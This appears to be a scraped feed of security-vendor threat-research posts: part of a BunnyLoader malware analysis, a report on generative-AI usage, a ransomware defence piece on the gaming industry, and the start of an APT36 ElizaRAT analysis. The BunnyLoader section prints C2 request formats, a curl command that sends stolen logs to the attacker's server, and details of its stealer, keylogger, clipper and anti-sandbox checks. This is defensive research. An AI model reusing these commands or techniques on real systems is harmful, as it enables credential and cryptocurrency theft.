“Spyware_Blocker” in the Run registry key (HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run) where the value is the path to the BunnyLoader binary. This registry value allows BunnyLoader to maintain persistence on the machine.Hides the window using ShowWindow() with nCmdShow as SW_HIDECreates a mutex name “BunnyLoader_MUTEXCONTROL” via CreateMutexW()Performs the following anti-VM techniques:Checks for the following modules:SxIn.dll - 360 Total Securitycmdvrt32.dll / cmdvrt64.dll - Comodo Antiviruswine_get_unix_file_name - Detects Wine SbieDll.dll - SandboxieChecks for a VM using “ROOT\CIMV2” queries:SELECT * FROM Win32_VideoControllerWin32_ProcessorWin32_NetworkAdapter Win32_BIOS SELECT * FROM Win32_ComputerSystemChecks for a Docker container via “/proc/1/cgroup” - if the container exists, BunnyLoader does not perform further malicious actions.Checks for the following blacklisted sandbox usernames:ANYRUNSandboxTestJohn DoeAbbyTimmyMaltestmalwareEmilyTimmyPaul JonesCurrentUserIT-ADMINWalkerLisaWDAGUtilityAccountVirusfredIf a sandbox is identified, BunnyLoader throws the following error message: “The version of this file is not compatible with the current version of Windows you are running. Check your computer's system information to see whether you need an x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher.”Otherwise, BunnyLoader performs an HTTP registration request to a C2 server as shown below:GET /Bunny/Add.php?country=<country>&ip=<ip>&host=<host>&ver=2.0&system=Microsoft+Windows+10+Pro%0A&privs=Admin&av=Windows+Defender HTTP/1.1 User-Agent: BunnyLoader Host: 37[.]139[.]129[.]145 Cache-Control: no-cache HTTP/1.1 200 OK Date: Mon, 25 Sep 2023 21:11:41 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 X-Powered-By: PHP/8.2.4 Content-Length: 11 Content-Type: text/html; charset=UTF-8 ConnectedThe registration request sent to the C2 server (shown above) contains the following information:Information in C2 server requestValueDescriptioncountryGathers the country where the infected system is connecting from via “http[:]//” where the user agent is “BunnyRequester”ipGathers the victim IP from “http[:]//” where the user agent is “BunnyRequester”hostGathers the hostname via GetComputerNameAverThe version of BunnyLoader (e.g., 2.0)systemFetches the operating system via “systeminfo | findstr /B /C:"OS Name”privsFetches the privileges of the current user via OpenProcessToken. Sends “Admin” if the user is an administrator or sends the string “user”.avGathers the anti-virus on the infected machine via wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName /valueThe user agent for the request is set to “BunnyLoader”. If the response from the C2 is “Connected”, BunnyLoader performs the core malicious actions.Task ExecutionAfter registration, BunnyLoader sends a task request to the C2 server “http[:]//37[.]139[.]129[.]145/Bunny/TaskHandler.php?BotID=<bot_id>” with the user agent as “BunnyTasks”. As shown below, the response to the task request consists of the “ID”, “Name” and “Params”.GET /Bunny/TaskHandler.php?BotID=<Bot_ID> HTTP/1.1 User-Agent: BunnyTasks Host: 37[.]139[.]129[.]145 Cache-Control: no-cache HTTP/1.1 200 OK Date: Mon, 25 Sep 2023 21:11:41 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 X-Powered-By: PHP/8.2.4 Content-Length: 102 Content-Type: text/html; charset=UTF-8 ID: 5 Name: Run Stealer Params: ID: 3 Name: Bitcoin Params: bc1<bitcoin_address>5kHere the "Name" is the module (functionality) to be executed and the “params” are the parameters passed to the module. Based on the module name received in the task response, BunnyLoader further performs its actions.BunnyLoader consists of the following tasks:Trojan DownloaderDownload and Execute (Fileless Execution)Download and Execute (Disk Execution)IntruderRun KeyloggerRun StealerClipperBitcoinMoneroEthereumLitecoinDogecoinZCashTetherRemote Command ExecutionRun Keylogger TaskBunnyLoader implements a basic keylogger using GetAsyncKeyState() for logging key strokes. The output of the keylogger is stored in the file “C:\Users\<username>\AppData\Local\Keystrokes.txt”.Run Stealer TaskBunnyStealer is designed to steal information related to web browsers, cryptocurrency wallets, VPNs and much more. Eventually the stolen information is stored in a folder named “BunnyLogs” in the Appdata\Local Directory, which is compressed as a ZIP archive, and exfiltrated to the C2 server. The following are the web browsers targeted by BunnyLoader:7Star\7Star\User DataYandex\YandexBrowser\User DataCentBrowser\User DataComodo\User DataChedot\User Data360Browser\Browser\User DataVivaldi\User DataMaxthon3\User DataKometa\User DataK-Melon\User DataElements Browser\User DataGoogle\Chrome\User Data\\Sputnik\Sputnik\User DataEpic Privacy Browser\User DataNichrome\User DatauCozMedia\Uran\User DataCocCoc\Browser\User DataFenrir Inc\Sleipnir5\setting\modules\ChromiumViewerUran\User DataCatalinaGroup\Citrio\User DataChromodo\User DataCoowon\Coowon\User DataMail.Ru\Atom\User Dataliebao\User DataMicrosoft\Edge\User DataQIP Surf\User DataBraveSoftware\Brave-Browser\User DataOrbitum\User DataChromium\User DataComodo\Dragon\User DataGoogle(x86)\Chrome\User DataAmigo\User\User DataMapleStudio\ChromePlus\User DataTorch\User DataIridium\User DataBunnyLoader steals following information from these web browsers:AutoFill dataCredit cardsDownloadsHistoryPasswordsThe malware targets the following cryptocurrency wallets:ArmoryExodusAutomaticWalletBytecoinEthereumCoinomiJaxxElectrumGuardaBunnyLoader steals credentials from the following VPN clients:ProtonVPN OpenVPNCredentials are also stolen from following messaging applications:SkypeToxSignalElementICQExamples of the stolen information are shown in the figure below. The logs consist of an information.txt file which contains system information along with the information related to the location of the infected machine. Each folder contains the corresponding data stolen from the system. For example, the Browser folder contains the web browser history and downloaded file information.Figure 5: A screenshot of the information exfiltrated by BunnyLoader.The stolen data is archived using the Powershell cmdlet: System.IO.Compression.ZipFile with the filename “BunnyLogs_<hostname>.zip”. The ZIP archive is exfiltrated to the C2 server via the following CURL command:cmd.exe /c curl -F "file=@C:\Users\user\AppData\Local\" http[:]//37[.]139[.]129[.]145/Bunny/Uploader.phpBunnyLoader also performs a stealer registration request containing statistics related to the stolen information and the link to the exfiltrated logs with the user agent: “BunnyStealer”, as shown below:GET /Bunny/StealerRegistration.php?country=<country>&ip=<ip>&system=Micro soft+Windows+10+Pro%0A&chromium=18&crypto=1&messages=0&vpn=0&keys=0&lin k=http%3A%2F%2F37[.]139[.]129[.]145%2FBunny%2FStealerLogs%2FBunnyLogs_ HTTP/1.1 User-Agent: BunnyStealer Host: 37[.]139[.]129[.]145 Cache-Control: no-cacheClipper TaskThe BunnyLoader clipper module checks a victim's clipboard for content matching cryptocurrency addresses and replaces them with a wallet address controlled by the threat actor.In this case, the targeted cryptocurrencies are: BitcoinMoneroEthereumLitecoinDogecoinZCashTetherThe clipper receives the cryptocurrency wallet addresses to replace from the C2 server.Download and Execute TaskBunnyLoader performs two types of download and execute functions. The first type is downloading a file from a URL provided by the C2, which is written to disk in the AppData\Local directory and further executed. The second type uses fileless execution, where BunnyLoader creates a “notepad.exe” process in a suspended state and then downloads the payload from the received URL with the user agent “BunnyLoader_Dropper”. The downloaded binary is stored in a memory buffer and BunnyLoader performs Process Hollowing to inject the downloaded payload into the “notepad.exe” process as shown in the figure below.Figure 6: A screenshot of BunnyLoader fileless download and executing code.After the tasks are completed, BunnyLoader sends the following task completion request with the user agent as “TaskCompleted” and the CommandID as the Task ID. An example task completion request is shown below:http://37[.]139[.]129[.]145/Bunny/TaskHandler.php?CommandID=5&BotID=272148461Remote Command Execution TaskBunnyLoader performs remote command execution from the C2 panel. BunnyLoader receives the commands to be executed on the infected machine via an “echoer” request to C2 server (e.g., http[:]//37[.]139[.]129[.]145/Bunny/Echoer.php) with the user agent set to “BunnyTasks” as shown in the figure below. BunnyLoader parses the response and checks for the following commands: “help”, “cd”, “pwd” and then executes the command using _popen and the command output is been sent across to the C2 server as the “&value=” parameter in a result command request: (e.g., http[:]//37[.]139[.]129[.]145/Bunny/ResultCMD.php) with the user agent: “BunnyShell”.Figure 7: A screenshot of BunnyLoader remote command execution.BunnyLoader also performs a heartbeat request in order to inform the C2 that the infected system is online as shown below. The user agent for the heartbeat is “HeartBeat_Sender”.GET /Bunny/Heartbeat.php?country=<country>&ip=<ip>&host=<hostname>&ver=2.0&system=Microsoft+Windows+10+Pro%0A&privs=Admin&av=Windows+Defender HTTP/1.1 User-Agent: HeartBeat_Sender Host: 37[.]139[.]129[.]145 Cache-Control: no-cache HTTP/1.1 200 OK Date: Mon, 25 Sep 2023 21:11:41 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 X-Powered-By: PHP/8.2.4 Content-Length: 13 Content-Type: text/html; charset=UTF-8 Client online ConclusionBunnyLoader is a new MaaS threat that is continuously evolving their tactics and adding new features to carry out successful campaigns against their targets. The Zscaler ThreatLabz team will continue to monitor these attacks to help keep our customers safe.Win32.Downloader.BunnyLoaderIndicators of Compromise (IOCs) C2 Server - 37[.]139[.]129[.]145/Bunny/ BunnyLoader samples: dbf727e1effc3631ae634d95a0d88bf3 bbf53c2f20ac95a3bc18ea7575f2344b 59ac3eacd67228850d5478fd3f18df78 Fri, 29 sep 2023 19:09:13 -0700 Niraj Shivtarkar Analysis of Generative AI Trends and ChatGPT Usage Introduction The release of ChatGPT underscores the potential of artificial intelligence to revolutionize the daily operations of organizations. This paradigm shift is compelling businesses to reevaluate their conventional approaches and embrace the transformative capabilities offered by AI. Among the noteworthy facets of AI’s evolution, Large Language Models (LLMs) have emerged as a dominant force, reshaping user interactions and communication. The driving force behind this transformation is the pursuit of vast datasets, enabling machine learning algorithms to analyze patterns and generate responses in a seamlessly natural language. In this blog, we aim to provide a comprehensive perspective on the impact of AI-powered applications and offer guidelines for the responsible integration of AI tools within organizational contexts. Key Takeaways - stands out as the preeminent domain for AI and ML enthusiasts, offering a wealth of resources, research, and interactive AI models. Notably, over half of the website’s traffic is attributed to ChatGPT, underlining its significant impact on user engagement and AI exploration. - Drift has secured its position as the most popular AI/ML application, specifically excelling in language processing through LLM-based SaaS solutions. Drift’s popularity rivals ChatGPT, which came in just under Drift by less than 1%. - ChatGPT experienced a substantial surge in usage during the initial months of this year, indicative of its growing relevance and adoption. However, the upward trajectory reached a plateau in August. - The lion’s share of AI/ML traffic is predominantly generated from the United States and India. The primary use case for this global traffic surge is the exploration and implementation of generative AI applications. AI vs LLMs AI and LLMs are two interconnected but distinct concepts in the field of computer science. AI represents the broader umbrella term, encompassing a wide array of techniques and technologies designed to simulate human intelligence and problem-solving. It includes machine learning, generative artificial intelligence models, natural language processing, computer vision, robotics, and deep learning, among others. LLMs are a specific subset of AI, focused primarily on natural language understanding and processing.1 How ChatGPT, and similar generative AI modules like GPT-3 and GPT-4, operate within the realm of AI applications has garnered significant attention in recent years. While AI has been in development for decades and encompasses a diverse range of technologies, LLMs have gained prominence relatively recently due to their remarkable ability to generate human-like text.2 AI/ML Usage Trends AI Usage Soars Then Stabilizes From April to June of this year, we observed a consistent upward trajectory in AI/ML usage and traffic. However, since August, there has been a gradual decline in activity since then, reflecting the dynamic nature of AI trends. Figure 1: A graph illustrating the sharp rise of AI traffic and sudden stabilization. AI’s Transformation of Manufacturing The manufacturing industry emerged as a key driver of AI/ML traffic, offering a compelling glimpse into the rapid advancements made during the Industry 4.0 era3. This sector’s engagement highlights the pivotal role of AI and ML in shaping the future of manufacturing. Besides manufacturing, the following industry verticals stood out: - Finance - Technology - Services Figure 2: A breakdown of the top AI/ML traffic producers by industry. As evident from the data presented, a significant portion of the observed transactions originates from the manufacturing sector, predominantly featuring applications like ChatGPT, Drift, and Pypestream. Simultaneously, the finance sector holds a substantial share, accounting for 17.2% of the transactions, driven primarily by the adoption of ChatGPT and Drift. Irrespective of the industry vertical, ChatGPT, Drift, and LivePerson emerge at the frontrunners in terms of popularity among generative AI-powered applications. Drift is an AI powered conversational tool that integrates with email and chat. While LivePerson is also an AI powered service for customer interaction. Figure 3: A graph showing usage over time by industry. ChatGPT, Driving Force Behind Popularity Unsurprisingly, emerged as the dominant player, accounting for a substantial share of our observed transactions, approximately 36% in total. Interestingly, within this substantial figure, a noteworthy 58% can be attributed to ChatGPT-related traffic. This data indicates the important role of in facilitating a significant portion of our transactions, with ChatGPT serving as a key driver of engagement and activity on the platform. After, the top domains are: - - - Figure 4: A breakdown of the top AI/ML-related domains. Drift Takes Lead in Language Processing The foremost AI/ML language processing application in use is Drift, leading the pack, with ChatGPT and LivePerson closely following suit. A significant focus among users revolves around language processing tools employing LLMs. The overarching goal centers on enhancing automated user interactions, as evidenced by widespread adoption in chatbot integration, in-hour writing tool utilization, and speech-to-text applications. Figure 5: A breakdown of the most popular language processing AI applications. ChatGPT Usage Trends ChatGPT Usage Sharply Rises Then Plateaus Our analysis reveals a notable pattern in ChatGPT usage. From May to June, we observed a sharp and noteworthy surge in ChatGPT-related transactions, followed by gradual ascent that extended until August. However, it is in this month that we witnessed a leveling off, marking a plateau in its usage, mirroring the broader trends evident in overall transaction patterns within the AI/ML traffic landscape. Figure 6: A graph showing the increase and then plateau of ChatGPT usage. ChatGPT’s Impact Across Top Verticals ChatGPT finds its most significant application and impact across a spectrum of key verticals, including manufacturing, finance, services, technology, and the energy sector. These diverse industries have integrated ChatGPT to enhance their operations, decision-making, and customer interactions. Figure 7: A breakdown of the top ChatGPT users by industry. Mirroring the broader AI/ML transaction trend, we observed a steep rise from May to June, followed by a sustained level of activity until August. However, it’s worth noting that while transactions related to AI/ML show a decline across various verticals, the finance sector stands out with a continuous rise since June. Figure 8: A graph depicting the rise and stabilization of ChatGPT in various sectors, except for finance - where ChatGPT has grown since June. Trends by Location The primary sources of traffic come from the United States, India, and the United Kingdom where ChatGPT, Drift, and LivePerson emerge as the top AI applications in use. This observation strongly reinforces our suggestion that, regardless of industry or national borders, language processing remains the foremost use case for generative AI applications. Across diverse verticals and geographies, the transformative impact of AI-powered language processing continues to shape AI adoption and innovation. Figure 9: A breakdown of the countries that generate most of the AI/ML-related traffic. Securing AI/ML Transactions Significantly, the majority of AI/ML-related transactions undergo thorough scrutiny so 10% of all AI/ML-related transactions are blocked using URL filtering policies. The technology sector takes the lead in blocking AI/ML transactions, closely followed by the finance and manufacturing sectors. Figure 10: A breakdown of which industries are blocking the most AI/ML-related transactions. Drift holds the unique distinction of being both the most used and most frequently blocked application. Figure 11: A pie chart showing how the overwhelming majority of blocked AI/ML transactions originate from Drift - a conversational AI application. AI/ML Best Practices Guide Considering the rapid advancement and adoption of AI-powered applications, it is crucial to establish and follow best practices to ensure the responsible and secure use of these transformative technologies. - Organizations must proactively adapt their AI usage and security policies to stay ahead of potential risks and challenges. - Recognize that AI-powered applications come with risk and continually assess and mitigate risks to protect intellectual property, personal data, and customer information. - Ensure that the use of AI tools complies with all relevant laws and ethical standards. This includes data protection regulations and privacy laws. - Establish clear accountability for the development and deployment of AI tools. Define roles and responsibilities within your organization to oversee AI projects. - Maintain transparency when using AI tools, Justify their use and communicate their purpose clearly to stakeholders. Guidelines - Do not provide non-public information, personally identifiable information (PII), proprietary company data, or any confidential information to AI models. - AI cannot replace a human being. It should not be used to make decisions without appropriate human intervention. - AI-generated content should not be used without human review and approval, especially in cases where the content represents your organization. - The development and integration of AI tools should follow a Secure Product Lifecycle Framework to guarantee the highest level of security. - Perform thorough product due diligence before implementing AI solutions. Make sure to evaluate their security and ethical implications. Conclusion From the release of ChatGPT and the prominence of AI-powered applications like Drift, to the pivotal role of LLMs and the services hosted on, we’re witnessing a dynamic AI revolution. The global interest, particularly from the United States and India, in generative AI applications highlights the transformative possibilities these technologies bring. As exciting as these changes are, it’s important to incorporate best practices and guidelines into your AI/ML strategy to ensure the responsible and ethical use of such AI-powered applications. As the technological landscape continues to shift, it’s essential to remain vigilant, responsible, and adaptive as we utilize AI/ML to shape the future. Zscaler's ThreatLabz team continuously monitors for new threats and shares its findings with the wider community. 1 2 3 Tue, 26 sep 2023 13:49:49 -0700 Deepak Shanker Ransomware Attacks on Gaming Industry - A CISO Perspective Introduction The gaming industry is experiencing a surge in cyber attacks because of its vast reservoirs of sensitive customer information, financial transactions, and interconnected operations. Zscaler’s ThreatLabz threat research team reported earlier this year that ransomware attacks had grown 37% overall year-over-year, with the average cost of an attack reaching a whopping $5.3M. The Department of Homeland Security recently released a report stating that ransomware groups are on pace for their second most profitable year ever, driven largely by ‘big game hunting’ attacks against large organizations. In light of the recent ransomware attacks ​​and the growing trend of attacks against the gaming industries, we want to offer a broader analysis of ransomware attacks and trends affecting the gaming industry and give practitioners an informed perspective for how they can safeguard customer trust and data. Key Takeaways - The gaming industry is a treasure trove of customer data and transaction details. The nature of the gaming industry requires companies to handle high volumes of customer data and transaction details. - Social engineering tactics played a prominent role in the most recent gaming cyberattacks. Recent cyberattacks continue to exploit social engineering techniques, but with a notable shift toward phone-based communication instead of email. This approach has proven effective due to lack of awareness and training when compared to email-based spam attacks, which are more familiar and often require education by organizations. - International law enforcement agencies shut down two of the largest initial access brokers, Emotet and Qakbot, that should potentially reduce ransomware activity worldwide in the near term. The fall of Emotet and Qakbot reduced primary infection vectors that leveraged malicious email attachments and links. However, threat actors are turning to alternative techniques to carry out attacks. - Minimizing external attack surface, preventing initial compromise, stopping compromised users & insider threats by eliminating lateral movement, and preventing data loss are the four core zero trust tenets for ransomware prevention. - UNC3944, an affiliate of the BlackCat ransomware threat group, is believed to be responsible for the recent cyber attacks on the gaming industry. - Ransomware attacks all follow a similar attack sequence. Understanding this attack sequence and employing security controls and strategies leveraging zero trust architecture is the key to an effective defense. Attack Vectors and TTPs Ransomware attacks have long been conducted using a variety of techniques including phishing and spam email, brute force attacks, and the exploitation of vulnerabilities. The use of phishing and spam email has long been a primary infection vector for ransomware threat actors and/or initial access brokers. However, two of the largest sources of spam email, Emotet and Qakbot, were disrupted by law enforcement operations. Qakbot in particular was a major player as an initial access broker for ransomware operations including BlackBasta. In recent weeks, ThreatLabz has observed a significant decline in BlackBasta ransomware activity corresponding to the demise of Qakbot. As a result, many ransomware initial access brokers are likely to use alternative techniques and recent attacks on the gaming industry demonstrate how these attacks (at least in the short term) are likely to be carried out. Interestingly, the attacks still continue to leverage social engineering, but rely on speaking over the phone rather than through email. This tactic has been used in prior attacks and appears to be increasingly effective because there is a lack of education, in contrast to spam, which is better understood and often requires mandatory training at many organizations. Although spam was not used in some recent attacks, the end goal is the same: to compromise a target environment, perform lateral movement to obtain access to an administrator’s account, exfiltrate sensitive information, and (optionally) deploy ransomware. ThreatLabz has observed the latter being used less frequently in attacks in so-called encryption-less extortion attacks. Many of the extortion-less attacks have been targeted at multi-billion dollar companies with the intent to reduce the impact and disruption associated with file encryption. In May 2023, the Clop ransomware group leveraged a supply-chain style attack targeting a zero-day vulnerability in the MOVEit Transfer application enabling the group to access and steal sensitive information from hundreds of organizations. That information was then leveraged to extort victims into paying a ransom. The Securities and Exchange Commission (SEC) has adopted rules that will require public companies to disclose material cybersecurity incidents in a standalone item on Form 8-K within four business days, which rules will become effective in December 2023. This change may have an impact on ransomware negotiations and possibly lead to a reduction in the number of companies that today pay ransoms to avoid public disclosure of a breach and the corresponding release of stolen information. To learn more about the SEC’s cybersecurity ruling and how it impacts public companies, visit The Impact of the SEC’s New Cybersecurity Policies. Suspected Threat Actors UNC3944 has taken over ransomware news headlines with multiple high-profile attacks against casinos. A financially-motivated threat group that has been active since May 2022, UNC3944 (a.k.a. Scattered Spider, Muddled Libra, 0ktapus, and Scatter Swine). According to a Reuters report, UNC3944 is believed to be composed primarily of young adults from the United States and United Kingdom. Their early attacks were waged against telecommunications organizations using techniques such as SIM swap scams, multi-factor authentication fatigue attacks, and SMS phishing. More recently, UNC3944 has become an affiliate group for BlackCat/ALPHV ransomware - a notorious malware family called out as one of the top 5 ransomware families in our 2023 ThreatLabz State of Ransomware Report. BlackCat was the second most prolific ransomware group performing double extortion attacks of the past year; only LockBit was responsible for more data leaks. The BlackCat group is a sophisticated RaaS operation that has been active since November 2021 (after previously being branded as DarkSide and BlackMatter), and is known to leverage affiliates that use a variety of methods to infiltrate victim networks, including exploiting known vulnerabilities, phishing attacks, and social engineering. Once inside a network, BlackCat operators typically use a combination of tools and techniques to move laterally, escalate privileges, and exfiltrate data. The group then deploys its ransomware payload, which encrypts the victim’s files. Hackers Leverage Multiple Trending Techniques The UNC3944 attacks underscore three major trends that ThreatLabz has reported in our research: Ransomware-as-a-service: Many of the most popular and damaging ransomware families of the last year are able to scale their profits and operations using a Ransomware-as-a-Service (RaaS) model. In this model, ransomware groups outsource the infiltration, lateral movement, data theft, and ultimate deployment of their ransomware payload in exchange for a commission. Double extortion: In double extortion ransomware attacks, threat actors not only encrypt data on the victims’ systems, but also exfiltrate it and threaten to publish it if ransoms are not paid. In 2021, ThreatLabz observed 19 ransomware families that adopted double or multi-extortion approaches to their cyberattacks. This has since grown to 44 ransomware families observed. The data extortion component of the attack has become so profitable that many threat families are now waging encryption-less ransomware attacks in which they do not even bother to encrypt data, but instead focus entirely on stealing data. These encryption-less ransomware attacks have the side benefit of attracting less attention from authorities because they do not disrupt business operations, yet are still extremely effective at generating ransom payments. Social engineering as a method of compromise: UNC3944 frequently leverages social engineering tactics in order to compromise systems. Many of their recent attacks began with phishing that enabled them to steal credentials and gain access to systems without triggering security controls. How to Defend Against Ransomware Attacks Ransomware attacks (and all cyberattacks, generally) all follow a similar sequence. In order to stop these attacks consistently, your security strategy should aim to disrupt as many stages of this attack chain as possible, which maximizes your chances of stopping the attack even if the threat actors should evade some of your security controls. The stages of the attack sequence are as follows: Figure 1: Ransomware attack sequence 1. Reconnaissance: Many ransomware attacks—especially ones targeted to large organizations—are extremely well-researched. Threat actors find out all the information that they can about your company, including who works there, what infrastructure is exposed to the internet, what applications are in use, and where you likely keep your most sensitive information. A key tactic to disrupt reconnaissance is to make yourself hard to find and hard to exploit. Key tips: - Remove vulnerable, routable appliances such as VPNs and north-south firewalls, in favor of more modern options for secure access. - Hide your key applications behind a proxy architecture so that they can’t be exploited. - Keep software and devices up-to-date with the most recent versions and security patches. - Identify and remediate misconfigurations and oversharing in cloud storage that may lead to discoverable data. 2. Compromise: Once a threat actor maps out their attack plan, they will need to compromise your organization. This could be through phishing, brute force, or through an exploit of a vulnerability. Putting robust inline security controls in place to deeply inspect traffic and block malicious files and behaviors is critical. Key tips: - Inspect as much traffic as possible—including encrypted traffic, as attackers utilize encrypted channels in more than 85% of attacks. - Utilize layered AI-powered security controls, including inline sandboxing, to stop never-before-seen threats. Attackers spin up new infrastructure extremely rapidly; the average phishing page is only 13 hours old. Relying on blocklists that only get updated every 12-24 hours is not good enough. - Only allow access to your crown jewel applications from managed devices, and ensure that your security strategy includes device posture checks to protect your sensitive data from attacks that start with credential theft. 3. Lateral movement: When the attacker is in, they’re going to escalate their privileges and perform internal reconnaissance, usually starting with the Active Directory. Ransomware attackers will then propagate their ransomware payloads across your infrastructure in order to encrypt data. Utilize zero trust strategies to minimize access and limit the blast radius of these tactics. Key tips: - Use ZTNA to maximize microsegmentation, connecting users only to one application at a time—never the network. - Ring-fence your applications with deceptive decoys that lure and confuse attackers, and that alert your SOC that malicious activity is underway. 4. Data theft: In double extortion or encryption-less ransomware attacks, the threat actor will find valuable information and exfiltrate it to a command-and-control server or a file sharing site where they can then hold it for ransom. Key tips: - Know your data: use AI-powered data classification tools to tag sensitive data and give yourself visibility into its movement. - Inspect your outgoing traffic—again including encrypted channels—and utilize policies to stop data from leaving sanctioned storage locations. Ransomware Best Practices and Mitigation Guarding against ransomware attacks requires a comprehensive approach that tackles every stage of the threat, minimizing potential harm. The Zscaler Zero Trust Exchange offers comprehensive ransomware protection across this entire attack sequence, with best-in-class security controls that are all delivered inline and at the edge. By adopting the following guidelines, you can effectively reduce the risk of falling victim to a ransomware attack. - Prevent initial compromise: Employ consistent security policies that ensure uncompromising security starting at your source code. By implementing extensive SSL inspection capabilities, browser isolation, inline sandboxing, and policy-driven access control, you can thwart access to malicious websites, block channels of initial compromise and detect unknown threats from reaching your users. - Stop compromised users and insider threats: Combining inline application inspection and Identity Threat Detection & Response (ITDR) with integrated deception capabilities empowers you to detect, deceive, and effectively stop potential attackers, whether they are external threats or insiders with malicious intent. - Minimize external attack surface and eliminate lateral movement: Prevent hackers from maneuvering within your network by disconnecting applications from the internet and embracing a zero trust network access (ZTNA) architecture. Directly connecting users to applications, and applications to applications, rather than the network itself, significantly restricts the potential reach of an attack. - Prevent data loss: Implement inline data loss prevention measures with full TLS inspection and thoroughly inspect data both while in transit and at rest, to effectively stop data theft attempts. Stay one step ahead of threat actors by regularly updating software and providing comprehensive security training. - Perform frequent audits: Regular cybersecurity audits play a crucial role in enhancing best practices and mitigation tactics. Audits can assess compliance adherence, which is pivotal when refining a cybersecurity strategy for the gaming industry, especially as compliance & regulations change - like the SECs new ruling on cybersecurity. In addition, regular audits can help you identify knowledge gaps in your user training and employee awareness. - Educate and train your employees regularly: Once knowledge gaps are identified, targeted and custom cybersecurity training programs can be put into place to empower and inform employees. This boosts employee awareness, and teaches them to recognize and respond to threats effectively. By leveraging the power of the Zscaler Zero Trust Exchange and adopting these best practices, organizations can proactively protect their users, workloads, IoT/OT devices and B2B connectivity, so that valuable data is safe from the ever-evolving threat landscape of ransomware attacks. Conclusion Recent ransomware attacks on international gaming companies are picking up speed. Phone-based social engineering tactics exploit knowledge gaps with training blindspots followed by VPN based entry into the environment that is a relatively flat legacy network. Considering the high volumes of customer data and financial transactions processed each day, this industry remains a prime target. Zscaler recommends all companies that handle sensitive or personal data adopt a proactive approach to cybersecurity countermeasures that continually verify access requests - in other words, a zero trust architecture. The reduction in ransomware attacks due to the demise of Emotet and Qakbot are promising; however, it also highlights how quickly threat actors adapt and turn to other alternatives. Ransomware attacks consistently adhere to a standardized attack sequence. Gaining insight into this attack sequence, and implementing security measures and strategies at multiple junctures is pivotal for achieving an ironclad cybersecurity defense. Zscaler's ThreatLabz team continuously monitors threat intelligence intel and shares its findings with the wider community. Tue, 19 sep 2023 13:58:50 -0700 Deepen Desai A peek into APT36’s updated arsenal Introduction In July 2023, Zscaler ThreatLabz discovered new malicious activity perpetuated by the Pakistan-based advanced persistent threat group (APT36). APT36 is a sophisticated cyber threat group with a history of conducting targeted espionage operations in South Asia. We observed APT36 targeting Indian government sectors using a previously undocumented Windows RAT, new cyber espionage utilities for Linux, new distribution mechanisms, and a new attack vector used against the Linux environment. In this blog, we will examine the latest tools employed by APT36, which are designed to target both Windows and Linux operating systems. Key Takeaways Updated arsenal of APT36: The threat actor has resurfaced with a fresh, fully functional Windows remote administration tool (RAT), novel tools for cyber espionage on Linux systems, innovative distribution methods, and additional attack vectors. New Windows RAT: A custom RAT, referred to as ElizaRAT, has been incorporated into the APT36 toolkit. ElizaRAT is delivered as a .NET binary and establishes a C2 communication channel via Telegram, enabling threat actors to exert complete control over the targeted endpoint. Abuse of legitimate services: Legitimate services, such as Google Drive and Telegram, are abused in different stages of the attack chain. New attack vectors for Linux: APT36 now boasts innovative weaponization of Linux desktop configuration files that target Linux-based endpoints in the Indian government sector. Deceptive tactics: The threat actor took extensive measures to conceal any link to Pakistan. They chose the infrastructure and artifacts meticulously to make it appear as though the activities were conducted in India. Reuse of infrastructure: In some cases, the same C2 infrastructure is being used by APT36 for both credential phishing attacks and distributing malicious binaries. Brief Overview APT36 is an advanced persistent threat (APT) group which we attribute to Pakistan with very high confidence. This group has been active since 2013 and primarily targets the Indian government, defense, and education sectors. This group leverages credential harvesting and malware distribution attacks to conduct cyber espionage. APT36 utilizes: Custom-built remote administration tools targeting Windows Lightweight Python-compiled cyber espionage tools serving specific purpose targeting Windows and Linux Weaponized open-source C2 frameworks like Mythic Trojanized installers of Indian government applications like KAVACH multi-factor authentication Trojanized Android apps Credential phishing sites targeting Indian government officials Analysis of ElizaRAT, the New Windows RAT We assigned the moniker “ElizaRAT” to this new Windows-based backdoor utilized by APT36 due to the distinctive strings identified within the commands observed during our real-time analysis of the C2 communication channel. ElizaRAT is distributed as .NET binaries sent inside password-protected archive files hosted on Google Drive links. During our threat analysis, we gathered several samples of ElizaRAT and they all shared these characteristics: They are all .NET binaries that are compiled as Control Panel applets (CPL) and use the ".cpl" file extension. To the best of our knowledge, we believe this is the first time APT36 has weaponized the CPL file format. The binaries are large in size - ranging from 4MB to 16MB. The Costura .NET framework was used to embed the essential .NET assemblies inside the main malware which resulted in the inflation of binary sizes. The Telegram API was used for C2 communication. For this technical analysis, we use the following file metadata: MD5 hash: fc99daa2e1b47bae4be51e5e59aef1f0 Filename: AgendaMeeting.cpl Since this Windows RAT arrives on the endpoint in the form of a Control Panel applet, the first method called upon execution is CplApplet(). This method transfers control to Program().Main() which in turn invokes an asynchronous task - MainAsync(). Inside this task, all important malicious operations are carried out. The image below shows Program().Main() kick starting the malicious activities on the endpoint. Figure 1: The MainAsync() method used to start the malicious activities on the endpoint. Some of the key operations performed by ElizaRAT are: Initializes the Telegram bot with Communicate.ConnectMe() using the built-in Telegram bot token and sets it up in polling mode to receive commands from the threat actor. Creates a directory: %appdata%\TextSource Generates a UUID and username specific to the infected machine. Drops and displays a decoy PDF file to the user. Sets up persistence on the machine. Fetches details on antivirus softwares running on the machine and sends the information to the attacker-controlled Telegram bot. In the following sections, we dive deeper into some of these operations. Logging Operation Each execution result is logged on both the endpoint (client-side) and the Telegram bot (server-side). The code below shows that logging is done at the local and remote level. // remote logging in Telegram bo await Communication.send_message("Username Created with name : " + TextSource.Settings._username); // local logging on the infected endpoint File.AppendAllText(TextSource.Settings.log_p, "username created local\n"); Unique Identifier Generation A UUID and username are generated for each infected machine so that the threat actor can uniquely identify the victim. It uses Windows Management Instrumentation (WMI) to fetch the processorID and UUID of the machine, and uses both these details to generate a UUID and username specific to the infected machine The only difference between the generated UUID and the username is the ".cookie" extension. The username is the UUID without the ".cookie" extension. The image below shows the relevant code used to generate these values. Figure 2: The getusername() method used to generate the UUID and username to identify the infected machine. C2 Command Format Since the threat actor uses the same Telegram bot to manage multiple infected endpoints, they use a specific C2 command format to synchronize the operations and ensure that a given command executes only on the intended endpoint. The C2 command format looks like this: 